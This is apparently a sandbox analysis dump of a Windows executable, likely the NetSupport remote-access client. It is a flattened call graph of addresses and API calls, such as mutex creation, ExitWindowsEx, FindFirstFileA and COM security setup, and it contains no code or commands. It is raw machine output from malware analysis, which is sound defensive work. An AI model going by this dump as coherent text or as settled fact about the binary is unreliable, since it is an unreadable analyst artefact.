GetProcAddress 56475->56477 56479 111349b0 GetProcAddress 56476->56479 56480 111349ca 56476->56480 56477->56476 56478 111349d7 SetLastError 56477->56478 56478->56479 56479->56480 56481 111349e4 SetLastError 56479->56481 56482 111349ef GetProcAddress 56480->56482 56481->56482 56483 11134a01 K32GetProcessMemoryInfo 56482->56483 56484 11134a0f SetLastError 56482->56484 56485 11134a17 56483->56485 56484->56485 56486 11147060 std::locale::facet::_Facet_Register 16 API calls 56485->56486 56493 11134a8d 56485->56493 56486->56493 56487 11134b6a 56488 11134b7a FreeLibrary 56487->56488 56489 11134b7d 56487->56489 56488->56489 56490 11134b87 FreeLibrary 56489->56490 56491 11134b8a 56489->56491 56490->56491 56491->56462 56492 11134b91 FreeLibrary 56491->56492 56492->56462 56493->56487 56494 11134b65 56493->56494 56672 11027de0 198 API calls std::locale::facet::_Facet_Register 56494->56672 56497 1113433d 56496->56497 56498 110d1930 199 API calls 56497->56498 56572 111347b1 56497->56572 56499 1113439e 56498->56499 56500 110d1930 199 API calls 56499->56500 56501 111343a9 56500->56501 56502 111343d7 56501->56502 56503 111343ee 56501->56503 56673 11029a70 198 API calls 2 library calls 56502->56673 56505 11147060 std::locale::facet::_Facet_Register 16 API calls 56503->56505 56507 111343fc 56505->56507 56508 11134415 56507->56508 56509 1113442c 56507->56509 56674 11029a70 198 API calls 2 library calls 56508->56674 56511 11081e70 66 API calls 56509->56511 56513 1113443a 56511->56513 56514 11134451 56513->56514 56675 110094d0 198 API calls std::locale::facet::_Facet_Register 56513->56675 56516 11147060 std::locale::facet::_Facet_Register 16 API calls 56514->56516 56529 111344da 56514->56529 56518 11134466 56516->56518 56517 1113444b 56519 11081d30 IsDBCSLeadByte 56517->56519 56520 11147060 std::locale::facet::_Facet_Register 16 API calls 56518->56520 56518->56529 56519->56514 56522 11134490 56520->56522 56521 11147060 std::locale::facet::_Facet_Register 16 API calls 56530 11134507 56521->56530 56676 110edb20 wvsprintfA RegCloseKey 56522->56676 56524 111344a8 56677 110ed7b0 202 API calls 2 library calls 56524->56677 56525 110ed520 3 API calls 56525->56530 56528 111344b9 56528->56529 56678 1101d360 198 API calls std::locale::facet::_Facet_Register 56528->56678 56529->56521 56535 1113459e 56529->56535 56530->56525 56532 1113456b 56530->56532 56530->56535 56679 110ed7b0 202 API calls 2 library calls 56530->56679 56532->56530 56680 11029a70 198 API calls 2 library calls 56532->56680 56533 111344cf 56536 11147060 std::locale::facet::_Facet_Register 16 API calls 56533->56536 56537 111345d1 56535->56537 56538 111345ba 56535->56538 56536->56529 56540 111345ce 56537->56540 56544 111345fc 56537->56544 56549 11134635 56537->56549 56681 11029a70 198 API calls 2 library calls 56538->56681 56540->56537 56682 11029a70 198 API calls 2 library calls 56540->56682 56541 111346dc 56545 11134726 56541->56545 56546 1113470f 56541->56546 56542 11134689 56542->56541 56543 11163aa5 _free 43 API calls 56542->56543 56547 1113469b 56543->56547 56550 11081e00 std::locale::facet::_Facet_Register IsDBCSLeadByte 56544->56550 56556 11134723 56545->56556 56563 11134755 56545->56563 56545->56572 56686 11029a70 198 API calls 2 library calls 56546->56686 56559 111346c3 __strdup 56547->56559 56560 111346ac 56547->56560 56549->56541 56549->56542 56553 11134632 56549->56553 56554 11134679 56549->56554 56555 11134607 56550->56555 56553->56549 56684 11029a70 198 API calls 2 library calls 56553->56684 56558 11081e70 66 API calls 56554->56558 56555->56549 56565 1113461e 56555->56565 56556->56545 56687 11029a70 198 API calls 2 library calls 56556->56687 56558->56542 56564 11147060 std::locale::facet::_Facet_Register 16 API calls 56559->56564 56685 11029a70 198 API calls 2 library calls 56560->56685 56568 11081e70 66 API calls 56563->56568 56564->56541 56683 11029a70 198 API calls 2 library calls 56565->56683 56571 11134763 56568->56571 56571->56572 56573 11134778 56571->56573 56574 1113478f 56571->56574 56572->56351 56688 11029a70 198 API calls 2 library calls 56573->56688 56576 11081d30 IsDBCSLeadByte 56574->56576 56578 1113479a 56576->56578 56578->56572 56689 110094d0 198 API calls std::locale::facet::_Facet_Register 56578->56689 56581 11142daf 56580->56581 56582 11142d9a 56580->56582 56581->56428 56690 11142400 56582->56690 56585 11139eaf 56584->56585 56586 11139a8d 56584->56586 56585->56355 56586->56585 56587 11145c70 std::locale::facet::_Facet_Register 72 API calls 56586->56587 56588 11139acc 56587->56588 56588->56585 56803 1112d860 56588->56803 56590 11139beb 56591 11139c40 PostMessageA 56590->56591 56592 11139c55 56590->56592 56591->56592 56593 11139c65 56592->56593 56810 11110000 InterlockedDecrement 56592->56810 56594 11139c6b 56593->56594 56595 11139c8d 56593->56595 56599 11139cc3 std::ios_base::_Ios_base_dtor 56594->56599 56600 11143a50 113 API calls 56594->56600 56811 11131320 217 API calls std::locale::facet::_Facet_Register 56595->56811 56598 11139c95 56812 11147ad0 19 API calls 56598->56812 56599->56355 56602 11139ce3 56600->56602 56604 11147af0 202 API calls 56602->56604 56603 11139c9f 56813 1112da60 SetDlgItemTextA 56603->56813 56607 11139cea SetWindowTextA 56604->56607 56606 11139b4b 56606->56590 56610 11146710 204 API calls 56606->56610 56609 11139d06 56607->56609 56614 11139d0d std::ios_base::_Ios_base_dtor 56607->56614 56608 11139cb0 std::ios_base::_Ios_base_dtor 56608->56594 56814 111361c0 230 API calls 2 library calls 56609->56814 56610->56590 56612 11139d64 56615 11139d78 56612->56615 56616 11139e3c 56612->56616 56613 11139d37 56613->56612 56619 11139d4c 56613->56619 56614->56612 56614->56613 56815 111361c0 230 API calls 2 library calls 56614->56815 56620 11139d9c 56615->56620 56817 111361c0 230 API calls 2 library calls 56615->56817 56618 11139e5d 56616->56618 56621 11139e4b 56616->56621 56622 11139e44 56616->56622 56618->56585 56630 11139e6c IsWindowVisible 56618->56630 56816 11132120 115 API calls 56619->56816 56620->56585 56628 11139daf IsWindowVisible 56620->56628 56821 11132120 115 API calls 56621->56821 56820 111361c0 230 API calls 2 library calls 56622->56820 56625 11139d5c 56625->56612 56628->56585 56634 11139dc6 56628->56634 56629 11139e5a 56629->56618 56630->56585 56632 11139e7e IsWindowVisible 56630->56632 56631 11139d86 56631->56620 56633 11139d92 56631->56633 56632->56585 56635 11139e8b EnableWindow 56632->56635 56818 11132120 115 API calls 56633->56818 56637 11145c70 std::locale::facet::_Facet_Register 72 API calls 56634->56637 56822 11132120 115 API calls 56635->56822 56640 11139dd1 56637->56640 56639 11139d99 56639->56620 56640->56585 56642 11139ddc GetForegroundWindow IsWindowVisible 56640->56642 56641 11139ea2 EnableWindow 56641->56585 56643 11139e01 56642->56643 56644 11139df6 EnableWindow 56642->56644 56819 11132120 115 API calls 56643->56819 56644->56643 56646 11139e08 56647 11139e1e EnableWindow 56646->56647 56648 11139e17 SetForegroundWindow 56646->56648 56649 11139e38 56647->56649 56648->56647 56649->56355 56650->56403 56651->56409 56652->56385 56653->56397 56654->56383 56655->56370 56656->56377 56657->56401 56658->56394 56659->56418 56660->56426 56661->56436 56662->56442 56663->56448 56664->56448 56665->56449 56666->56451 56667->56455 56668->56455 56669->56459 56670->56469 56671->56471 56672->56487 56675->56517 56676->56524 56677->56528 56678->56533 56679->56530 56689->56572 56691 1114243f 56690->56691 56695 11142438 std::ios_base::_Ios_base_dtor 56690->56695 56692 111101b0 std::locale::facet::_Facet_Register 200 API calls 56691->56692 56693 11142446 56692->56693 56694 11142476 56693->56694 56696 11061aa0 234 API calls 56693->56696 56697 11062220 92 API calls 56694->56697 56695->56581 56696->56694 56698 111424b2 56697->56698 56699 111424b9 RegCloseKey 56698->56699 56700 111424c0 std::locale::facet::_Facet_Register 56698->56700 56699->56700 56701 111424cf 56700->56701 56702 1102a6d0 313 API calls 56700->56702 56703 11145990 200 API calls 56701->56703 56702->56701 56704 111424ec 56703->56704 56705 11143e00 std::locale::facet::_Facet_Register 3 API calls 56704->56705 56706 11142500 56705->56706 56707 11142517 56706->56707 56708 11063880 287 API calls 56706->56708 56709 111101b0 std::locale::facet::_Facet_Register 200 API calls 56707->56709 56708->56707 56710 1114251e 56709->56710 56711 1114253a 56710->56711 56712 11061710 225 API calls 56710->56712 56713 111101b0 std::locale::facet::_Facet_Register 200 API calls 56711->56713 56712->56711 56714 11142553 56713->56714 56715 1114256f 56714->56715 56716 11061710 225 API calls 56714->56716 56717 111101b0 std::locale::facet::_Facet_Register 200 API calls 56715->56717 56716->56715 56718 11142588 56717->56718 56719 111425a4 56718->56719 56720 11061710 225 API calls 56718->56720 56721 11061290 202 API calls 56719->56721 56720->56719 56722 111425cd 56721->56722 56723 11061290 202 API calls 56722->56723 56752 111425e7 56723->56752 56724 11142915 56724->56695 56726 110d1930 199 API calls 56724->56726 56725 11061320 211 API calls 56725->56752 56731 11142933 56726->56731 56727 11142905 56728 11147060 std::locale::facet::_Facet_Register 16 API calls 56727->56728 56728->56724 56729 11081e70 66 API calls 56729->56752 56730 11147060 16 API calls std::locale::facet::_Facet_Register 56730->56752 56733 11061290 202 API calls 56731->56733 56776 11142a91 56731->56776 56732 11061a70 211 API calls 56734 11142ad9 56732->56734 56736 1114298e 56733->56736 56796 110684e0 262 API calls std::locale::facet::_Facet_Register 56734->56796 56735 11132900 66 API calls 56735->56752 56737 11061320 211 API calls 56736->56737 56743 1114299d 56737->56743 56738 111429d2 56741 11061290 202 API calls 56738->56741 56740 11147060 std::locale::facet::_Facet_Register 16 API calls 56740->56743 56744 111429e8 56741->56744 56742 11142b03 56745 11142b33 EnterCriticalSection 56742->56745 56754 11142b07 56742->56754 56743->56738 56743->56740 56747 11061320 211 API calls 56743->56747 56748 11061320 211 API calls 56744->56748 56746 11142b50 56745->56746 56751 11061a70 211 API calls 56746->56751 56747->56743 56765 111429f8 56748->56765 56749 11081f20 66 API calls std::locale::facet::_Facet_Register 56749->56752 56756 11142b66 56751->56756 56752->56724 56752->56725 56752->56727 56752->56729 56752->56730 56752->56735 56752->56749 56753 11142a31 56754->56745 56797 11051360 295 API calls 2 library calls 56754->56797 56798 110684e0 262 API calls std::locale::facet::_Facet_Register 56754->56798 56758 11142b7a LeaveCriticalSection 56756->56758 56762 1102b140 212 API calls 56756->56762 56759 11147060 std::locale::facet::_Facet_Register 16 API calls 56759->56765 56765->56753 56765->56759 56768 11061320 211 API calls 56765->56768 56768->56765 56776->56732 56796->56742 56797->56754 56798->56754 56804 1112d87c 56803->56804 56805 1112d8b7 56804->56805 56806 1112d8a4 56804->56806 56823 1106c340 262 API calls 56805->56823 56808 11147af0 202 API calls 56806->56808 56809 1112d8af 56808->56809 56809->56606 56810->56593 56811->56598 56812->56603 56813->56608 56814->56614 56815->56613 56816->56625 56817->56631 56818->56639 56819->56646 56820->56621 56821->56629 56822->56641 56823->56809 56824 11135c20 56825 11135c37 56824->56825 56826 11135c29 56824->56826 56827 11145ef0 std::locale::facet::_Facet_Register 72 API calls 56826->56827 56828 11135c2e 56827->56828 56828->56825 56829 11133b00 207 API calls 56828->56829 56829->56825 56830 951020 GetCommandLineA 56832 951035 GetStartupInfoA 56830->56832 56833 951090 GetModuleHandleA 56832->56833 56834 95108b 56832->56834 56837 951000 _NSMClient32 56833->56837 56834->56833 56836 9510a2 ExitProcess 56837->56836 56838 1115cca0 56839 1115ccb4 56838->56839 56840 1115ccac 56838->56840 56850 1116406b 56839->56850 56843 1115ccd4 56844 1115ce00 56846 11163aa5 _free 43 API calls 56844->56846 56847 1115ce28 56846->56847 56848 1115ccf1 56848->56844 56849 1115cde4 SetLastError 56848->56849 56849->56848 56851 11170fc4 __calloc_crt 43 API calls 56850->56851 56852 11164085 56851->56852 56856 1115ccc8 56852->56856 56872 1116a1af 43 API calls __getptd_noexit 56852->56872 56854 11164098 56854->56856 56873 1116a1af 43 API calls __getptd_noexit 56854->56873 56856->56843 56856->56844 56857 1115c8e0 CoInitializeSecurity CoCreateInstance 56856->56857 56858 1115c955 wsprintfW SysAllocString 56857->56858 56860 1115cad4 56857->56860 56862 1115c99b 56858->56862 56859 1115cac1 SysFreeString 56859->56860 56860->56848 56861 1115caa9 56861->56859 56862->56859 56862->56861 56862->56862 56863 1115ca2c 56862->56863 56864 1115ca1a wsprintfW 56862->56864 56874 110978f0 56863->56874 56864->56863 56866 1115ca3e 56867 110978f0 201 API calls 56866->56867 56868 1115ca53 56867->56868 56879 110979a0 InterlockedDecrement SysFreeString std::ios_base::_Ios_base_dtor 56868->56879 56870 1115ca97 56880 110979a0 InterlockedDecrement SysFreeString std::ios_base::_Ios_base_dtor 56870->56880 56872->56854 56873->56856 56875 111101b0 std::locale::facet::_Facet_Register 200 API calls 56874->56875 56876 11097923 56875->56876 56877 11097936 SysAllocString 56876->56877 56878 11097954 56876->56878 56877->56878 56878->56866 56879->56870 56880->56861 56881 1102d9f4 56882 1102da01 56881->56882 56883 1102da22 56882->56883 56957 1109f5f0 208 API calls std::locale::facet::_Facet_Register 56882->56957 56958 11029490 266 API calls std::locale::facet::_Facet_Register 56883->56958 56886 1102da33 56943 11028690 SetEvent 56886->56943 56888 1102da38 56889 1102da42 56888->56889 56890 1102da6f 56888->56890 56889->56888 56959 11059fb0 SetEvent 56889->56959 56892 1102da77 56890->56892 56893 1102daae 56890->56893 56892->56893 56898 1102daa3 Sleep 56892->56898 56894 11147060 std::locale::facet::_Facet_Register 16 API calls 56893->56894 56895 1102dab8 56894->56895 56896 1102daf6 56895->56896 56899 1102dac5 56895->56899 56897 1102daf3 56896->56897 56944 110b0470 56896->56944 56897->56896 56898->56893 56899->56895 56899->56896 56960 1102d750 225 API calls std::locale::facet::_Facet_Register 56899->56960 56906 1102db3a 56907 1102db4d 56906->56907 56962 111361c0 230 API calls 2 library calls 56906->56962 56909 1100d620 FreeLibrary 56907->56909 56910 1102de59 56909->56910 56911 1102de70 56910->56911 56912 1100d330 wsprintfA 56910->56912 56915 1102de97 GetModuleFileNameA GetFileAttributesA 56911->56915 56921 1102dfb3 56911->56921 56913 1102de65 56912->56913 56914 11147060 std::locale::facet::_Facet_Register 16 API calls 56913->56914 56914->56911 56916 1102debf 56915->56916 56915->56921 56918 111101b0 std::locale::facet::_Facet_Register 200 API calls 56916->56918 56917 11147060 std::locale::facet::_Facet_Register 16 API calls 56919 1102e062 56917->56919 56931 1102dec6 56918->56931 56965 11147020 FreeLibrary 56919->56965 56921->56917 56922 1102e06a 56923 1102e0a6 56922->56923 56926 1102e094 ExitWindowsEx 56922->56926 56927 1102e084 ExitWindowsEx Sleep 56922->56927 56924 1102e0b6 56923->56924 56925 1102e0ab Sleep 56923->56925 56928 11147060 std::locale::facet::_Facet_Register 16 API calls 56924->56928 56925->56924 56926->56923 56927->56926 56930 1102e0c0 ExitProcess 56928->56930 56932 11143780 66 API calls 56931->56932 56933 1102df0d 56932->56933 56933->56921 56934 11081e00 std::locale::facet::_Facet_Register IsDBCSLeadByte 56933->56934 56935 1102df23 56934->56935 56936 1102df3e _memset FindFirstFileA 56935->56936 56963 11029a70 198 API calls 2 library calls 56935->56963 56938 1102df78 FindNextFileA 56936->56938 56940 1102df98 FindClose 56938->56940 56941 1102dfa4 56940->56941 56964 111273e0 227 API calls 2 library calls 56941->56964 56943->56888 56945 110b049e 56944->56945 56966 110b0460 56945->56966 56948 1102db1a 56952 110eb4a0 56948->56952 56949 110b04b7 56969 11029a70 198 API calls 2 library calls 56949->56969 56953 110b0470 200 API calls 56952->56953 56954 110eb4cd 56953->56954 56978 110b0660 200 API calls std::locale::facet::_Facet_Register 56954->56978 56956 1102db25 56961 110b0660 200 API calls std::locale::facet::_Facet_Register 56956->56961 56957->56883 56958->56886 56959->56890 56960->56897 56961->56906 56962->56907 56964->56921 56965->56922 56970 11081590 56966->56970 56968 110b0465 56968->56948 56968->56949 56972 110815b1 56970->56972 56971 110815cb 56971->56968 56972->56971 56973 1108162a wsprintfA 56972->56973 56974 11081605 wsprintfA 56972->56974 56977 11029a70 198 API calls 2 library calls 56973->56977 56974->56972 56978->56956 56979 110310d5 GetNativeSystemInfo 56980 110310e1 56979->56980 56983 11031081 56980->56983 56984 11031145 56980->56984 56990 11031088 56980->56990 56981 110312db GetStockObject GetObjectA 56982 1103130a SetErrorMode SetErrorMode 56981->56982 56988 111101b0 std::locale::facet::_Facet_Register 200 API calls 56982->56988 56987 111101b0 std::locale::facet::_Facet_Register 200 API calls 56983->56987 56986 111101b0 std::locale::facet::_Facet_Register 200 API calls 56984->56986 56986->56990 56987->56990 56989 11031346 56988->56989 56991 111101b0 std::locale::facet::_Facet_Register 200 API calls 56989->56991 56990->56981 56992 11031386 56991->56992 56993 110313a3 InterlockedExchange 56992->56993 56994 111101b0 std::locale::facet::_Facet_Register 200 API calls 56993->56994 56995 110313c7 56994->56995 56996 110313e3 GetACP 56995->56996 56997 11163f93 _sprintf 70 API calls 56996->56997 56998 11031406 56997->56998 56999 111663a3 _setlocale 110 API calls 56998->56999 57000 11031410 56999->57000 57001 11143780 66 API calls 57000->57001 57002 1103143c 57001->57002 57003 111101b0 std::locale::facet::_Facet_Register 200 API calls 57002->57003 57004 1103145c 57003->57004 57005 11061aa0 234 API calls 57004->57005 57007 11031487 57005->57007 57006 110314d4 57010 111101b0 std::locale::facet::_Facet_Register 200 API calls 57006->57010 57007->57006 57008 111101b0 std::locale::facet::_Facet_Register 200 API calls 57007->57008 57009 110314ae 57008->57009 57011 11061710 225 API calls 57009->57011 57012 11031501 57010->57012 57011->57006 57013 11125d40 419 API calls 57012->57013 57014 11031523 57013->57014 57015 111101b0 std::locale::facet::_Facet_Register 200 API calls 57014->57015 57016 1103155b 57015->57016 57017 111101b0 std::locale::facet::_Facet_Register 200 API calls 57016->57017 57018 1103158a 57017->57018 57019 1105d1a0 379 API calls 57018->57019 57020 110315d4 57019->57020 57021 11027810 104 API calls 57020->57021 57022 110315d9 57021->57022 57023 1100d620 FreeLibrary 57022->57023 57024 110315f4 57023->57024 57025 1100d330 wsprintfA 57024->57025 57027 1103160d 57024->57027 57026 11031602 57025->57026 57028 11147060 std::locale::facet::_Facet_Register 16 API calls 57026->57028 57028->57027 57029 11089cf0 57030 111103d0 ___DllMainCRTStartup 4 API calls 57029->57030 57031 11089d03 57030->57031 57033 11089d0d 57031->57033 57041 11089430 201 API calls std::locale::facet::_Facet_Register 57031->57041 57034 11089d34 57033->57034 57042 11089430 201 API calls std::locale::facet::_Facet_Register 57033->57042 57037 11089d43 57034->57037 57038 11089cc0 57034->57038 57043 11089950 57038->57043 57040 11089ce0 57040->57037 57041->57033 57042->57034 57044 11088c40 57043->57044 57045 11089989 GetParent 57044->57045 57046 1108999c 57045->57046 57047 110899ad 57045->57047 57048 110899a0 GetParent 57046->57048 57049 11145990 200 API calls 57047->57049 57048->57047 57048->57048 57050 110899b9 57049->57050 57051 11164ead std::locale::facet::_Facet_Register 111 API calls 57050->57051 57052 110899c6 std::ios_base::_Ios_base_dtor 57051->57052 57053 11145990 200 API calls 57052->57053 57054 110899df 57053->57054 57078 11013dd0 17 API calls std::locale::facet::_Facet_Register 57054->57078 57056 110899fa 57056->57056 57057 11143e00 std::locale::facet::_Facet_Register 3 API calls 57056->57057 57058 11089a3a std::ios_base::_Ios_base_dtor 57057->57058 57059 11164c77 std::locale::facet::_Facet_Register 51 API calls 57058->57059 57060 11089a73 std::locale::facet::_Facet_Register 57058->57060 57059->57060 57061 1102ad70 std::locale::facet::_Facet_Register 113 API calls 57060->57061 57069 11089b24 std::ios_base::_Ios_base_dtor 57060->57069 57062 11089ac3 57061->57062 57063 11081e00 std::locale::facet::_Facet_Register IsDBCSLeadByte 57062->57063 57064 11089ae2 57063->57064 57065 11081e70 66 API calls 57064->57065 57064->57069 57066 11089afa 57065->57066 57067 11089b3e 57066->57067 57068 11089b01 57066->57068 57070 11081e70 66 API calls 57067->57070 57079 110b7aa0 57068->57079 57069->57040 57072 11089b49 57070->57072 57072->57069 57074 110b7aa0 45 API calls 57072->57074 57076 11089b56 57074->57076 57075 110b7aa0 45 API calls 57075->57069 57076->57069 57077 110b7aa0 45 API calls 57076->57077 57077->57069 57078->57056 57082 110b7a80 57079->57082 57085 111681a3 57082->57085 57088 11168124 57085->57088 57087 11089b07 57087->57069 57087->57075 57089 11168131 57088->57089 57090 1116814b 57088->57090 57104 1116a1c2 43 API calls __getptd_noexit 57089->57104 57090->57089 57092 11168154 GetFileAttributesA 57090->57092 57094 11168162 GetLastError 57092->57094 57095 11168178 57092->57095 57093 11168136 57105 1116a1af 43 API calls __getptd_noexit 57093->57105 57106 1116a1d5 43 API calls 3 library calls 57094->57106 57101 1116813d 57095->57101 57108 1116a1c2 43 API calls __getptd_noexit 57095->57108 57098 1116816e 57107 1116a1af 43 API calls __getptd_noexit 57098->57107 57101->57087 57102 1116818b 57109 1116a1af 43 API calls __getptd_noexit 57102->57109 57104->57093 57105->57101 57106->57098 57107->57101 57108->57102 57109->57098 57110 11030b78 57111 11030b86 57110->57111 57112 11143780 66 API calls 57111->57112 57113 11030bc3 57112->57113 57114 11030bd8 57113->57114 57115 11081e70 66 API calls 57113->57115 57116 110ed520 3 API calls 57114->57116 57115->57114 57117 11030bff 57116->57117 57126 11030c49 57117->57126 57164 110ed5d0 57 API calls std::locale::facet::_Facet_Register 57117->57164 57119 11030c14 57165 110ed5d0 57 API calls std::locale::facet::_Facet_Register 57119->57165 57121 11143780 66 API calls 57123 11030c60 57121->57123 57122 11030c2b 57124 11146fe0 14 API calls 57122->57124 57122->57126 57125 111101b0 std::locale::facet::_Facet_Register 200 API calls 57123->57125 57124->57126 57127 11030c6f 57125->57127 57126->57121 57128 11030ca3 OpenMutexA 57127->57128 57129 11030cc3 CreateMutexA 57128->57129 57130 11030dda CloseHandle 57128->57130 57131 11030ce3 57129->57131 57135 11030df0 57130->57135 57132 111101b0 std::locale::facet::_Facet_Register 200 API calls 57131->57132 57133 11030cf8 57132->57133 57134 11030d1b 57133->57134 57136 11061710 225 API calls 57133->57136 57154 110161e0 LoadLibraryA 57134->57154 57136->57134 57138 11030d2d 57139 11145c70 std::locale::facet::_Facet_Register 72 API calls 57138->57139 57140 11030d3c 57139->57140 57141 11030d49 57140->57141 57142 11030d5c 57140->57142 57155 111466b0 57141->57155 57144 11030d66 GetProcAddress 57142->57144 57145 11030d50 57142->57145 57144->57145 57146 11030d80 SetLastError 57144->57146 57147 110287a0 42 API calls 57145->57147 57146->57145 57148 11030d8d 57147->57148 57166 11009370 380 API calls std::locale::facet::_Facet_Register 57148->57166 57150 11030d9c 57151 11030db0 WaitForSingleObject 57150->57151 57151->57151 57152 11030dc2 CloseHandle 57151->57152 57152->57130 57153 11030dd3 FreeLibrary 57152->57153 57153->57130 57154->57138 57156 11145c70 std::locale::facet::_Facet_Register 72 API calls 57155->57156 57157 111466c2 57156->57157 57158 11146700 57157->57158 57159 111466c9 LoadLibraryA 57157->57159 57158->57145 57160 111466fa 57159->57160 57161 111466db GetProcAddress 57159->57161 57160->57145 57162 111466f3 FreeLibrary 57161->57162 57163 111466eb 57161->57163 57162->57160 57163->57162 57164->57119 57165->57122 57166->57150 57167 1116a5cd 57168 1116a5dd 57167->57168 57169 1116a5d8 57167->57169 57173 1116a4d7 57168->57173 57185 11177f37 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 57169->57185 57172 1116a5eb 57174 1116a4e3 _fgetc 57173->57174 57178 1116a530 57174->57178 57184 1116a580 _fgetc 57174->57184 57186 1116a373 57174->57186 57177 1116a543 57179 1116a560 57177->57179 57181 11026410 ___DllMainCRTStartup 7 API calls 57177->57181 57178->57184 57234 11026410 57178->57234 57180 1116a373 __CRT_INIT@12 119 API calls 57179->57180 57179->57184 57180->57184 57182 1116a557 57181->57182 57183 1116a373 __CRT_INIT@12 119 API calls 57182->57183 57183->57179 57184->57172 57185->57168 57187 1116a37f _fgetc 57186->57187 57188 1116a387 57187->57188 57189 1116a401 57187->57189 57243 1116e390 HeapCreate 57188->57243 57191 1116a407 57189->57191 57192 1116a462 57189->57192 57196 1116a425 57191->57196 57202 1116a390 _fgetc 57191->57202 57305 1116e65b 43 API calls _doexit 57191->57305 57193 1116a467 57192->57193 57194 1116a4c0 57192->57194 57195 1116c4ba ___set_flsgetvalue 3 API calls 57193->57195 57194->57202 57311 1116c7be 56 API calls __freefls@4 57194->57311 57198 1116a46c 57195->57198 57200 1116a439 57196->57200 57306 1117226e 44 API calls _free 57196->57306 57203 1116ac7e __calloc_crt 43 API calls 57198->57203 57309 1116a44c 47 API calls __mtterm 57200->57309 57202->57178 57206 1116a478 57203->57206 57204 1116a38c __RTC_Initialize 57204->57202 57207 1116a3a0 57204->57207 57213 1116a3ac GetCommandLineA 57204->57213 57206->57202 57210 1116a484 DecodePointer 57206->57210 57302 1116e3ae HeapDestroy 57207->57302 57208 1116a42f 57307 1116c50b 47 API calls _free 57208->57307 57216 1116a499 57210->57216 57212 1116a434 57308 1116e3ae HeapDestroy 57212->57308 57244 11177e54 GetEnvironmentStringsW 57213->57244 57218 1116a4b4 57216->57218 57219 1116a49d 57216->57219 57221 11163aa5 _free 43 API calls 57218->57221 57310 1116c548 43 API calls 4 library calls 57219->57310 57221->57202 57223 1116a4a4 GetCurrentThreadId 57223->57202 57225 1116a3ca 57303 1116c50b 47 API calls _free 57225->57303 57229 1116a3ea 57229->57202 57304 1117226e 44 API calls _free 57229->57304 57235 111104e0 57234->57235 57236 11110501 57235->57236 57237 111104ec 57235->57237 57238 11110514 ___DllMainCRTStartup 57235->57238 57323 11110430 57236->57323 57237->57238 57240 11110430 ___DllMainCRTStartup 7 API calls 57237->57240 57238->57177 57242 111104f5 57240->57242 57241 11110508 57241->57177 57242->57177 57243->57204 57245 11177e70 WideCharToMultiByte 57244->57245 57246 1116a3bc 57244->57246 57248 11177ea5 __malloc_crt 57245->57248 57249 11177edd FreeEnvironmentStringsW 57245->57249 57255 11172029 GetStartupInfoW 57246->57255 57248->57249 57250 11177eb3 WideCharToMultiByte 57248->57250 57249->57246 57251 11177ec5 57250->57251 57252 11177ed1 FreeEnvironmentStringsW 57250->57252 57253 11163aa5 _free 43 API calls 57251->57253 57252->57246 57254 11177ecd 57253->57254 57254->57252 57256 1116ac7e __calloc_crt 43 API calls 57255->57256 57264 11172047 57256->57264 57257 1116a3c6 57257->57225 57268 11177d99 57257->57268 57258 111721bc 57259 111721f2 GetStdHandle 57258->57259 57261 11172256 SetHandleCount 57258->57261 57262 11172204 GetFileType 57258->57262 57267 1117222a InitializeCriticalSectionAndSpinCount 57258->57267 57259->57258 57260 1116ac7e __calloc_crt 43 API calls 57260->57264 57261->57257 57262->57258 57263 1117213c 57263->57258 57265 11172173 InitializeCriticalSectionAndSpinCount 57263->57265 57266 11172168 GetFileType 57263->57266 57264->57257 57264->57258 57264->57260 57264->57263 57265->57257 57265->57263 57266->57263 57266->57265 57267->57257 57267->57258 57269 11177db3 GetModuleFileNameA 57268->57269 57270 11177dae 57268->57270 57272 11177dda 57269->57272 57318 11171a45 76 API calls __setmbcp 57270->57318 57312 11177bff 57272->57312 57275 1116a3d6 57275->57229 57279 11177b23 57275->57279 57276 11177e16 __malloc_crt 57276->57275 57277 11177e23 57276->57277 57278 11177bff _parse_cmdline 53 API calls 57277->57278 57278->57275 57280 11177b31 57279->57280 57281 11177b2c 57279->57281 57283 1116a3df 57280->57283 57284 11177b5d 57280->57284 57285 11177b4c _strlen 57280->57285 57320 11171a45 76 API calls __setmbcp 57281->57320 57283->57229 57296 1116e46e 57283->57296 57286 1116ac7e __calloc_crt 43 API calls 57284->57286 57285->57280 57291 11177b66 57286->57291 57287 11177bb5 57289 11163aa5 _free 43 API calls 57287->57289 57288 11177b7d _strlen 57288->57291 57289->57283 57290 1116ac7e __calloc_crt 43 API calls 57290->57291 57291->57283 57291->57287 57291->57288 57291->57290 57292 11177b9c _strcpy_s 57291->57292 57293 11177bdb 57291->57293 57292->57291 57294 11177bf2 __invoke_watson 57292->57294 57295 11163aa5 _free 43 API calls 57293->57295 57295->57283 57298 1116e47c __IsNonwritableInCurrentImage 57296->57298 57321 1116d88b EncodePointer 57298->57321 57299 1116e49a __initterm_e 57301 1116e4bb __IsNonwritableInCurrentImage 57299->57301 57322 11163dd5 51 API calls __cinit 57299->57322 57301->57229 57302->57202 57303->57207 57304->57225 57305->57196 57306->57208 57307->57212 57308->57200 57309->57202 57310->57223 57311->57202 57313 11177c1e 57312->57313 57317 11177c8b 57313->57317 57319 11177590 53 API calls x_ismbbtype_l 57313->57319 57315 11177d89 57315->57275 57315->57276 57316 11177590 53 API calls _parse_cmdline 57316->57317 57317->57315 57317->57316 57318->57269 57319->57313 57320->57280 57321->57299 57322->57301 57324 11110474 EnterCriticalSection 57323->57324 57325 1111045f InitializeCriticalSection 57323->57325 57327 11110495 57324->57327 57325->57324 57326 111104c3 LeaveCriticalSection 57326->57241 57327->57326 57328 111103d0 ___DllMainCRTStartup 4 API calls 57327->57328 57328->57327

                                                                              Executed Functions

                                                                              Function 1109E5B0 Relevance: 100.3, APIs: 42, Strings: 15, Instructions: 501filethreadmemoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
